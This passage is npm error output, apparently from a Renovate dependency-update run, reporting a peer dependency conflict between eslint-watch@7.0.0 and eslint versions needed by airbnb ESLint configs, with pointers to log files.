npm error   10 more (eslint-config-airbnb, eslint-config-airbnb-base, ...)
npm error
npm error Could not resolve dependency:
npm error peer eslint@">=7 <8.0.0" from eslint-watch@7.0.0
npm error node_modules/eslint-watch
npm error   dev eslint-watch@"7.0.0" from the root project
npm error
npm error Conflicting peer dependency: eslint@7.32.0
npm error node_modules/eslint
npm error   peer eslint@">=7 <8.0.0" from eslint-watch@7.0.0
npm error   node_modules/eslint-watch
npm error     dev eslint-watch@"7.0.0" from the root project
npm error
npm error Fix the upstream dependency conflict, or retry
npm error this command with --force or --legacy-peer-deps
npm error to accept an incorrect (and potentially broken) dependency resolution.
npm error
npm error
npm error For a full report see:
npm error /tmp/renovate/cache/others/npm/_logs/2024-08-06T10_44_36_056Z-eresolve-report.txt
npm error A complete log of this run can be found in: /tmp/renovate/cache/others/npm/_logs/2024-08-06T10_44_36_056Z-debug-0.log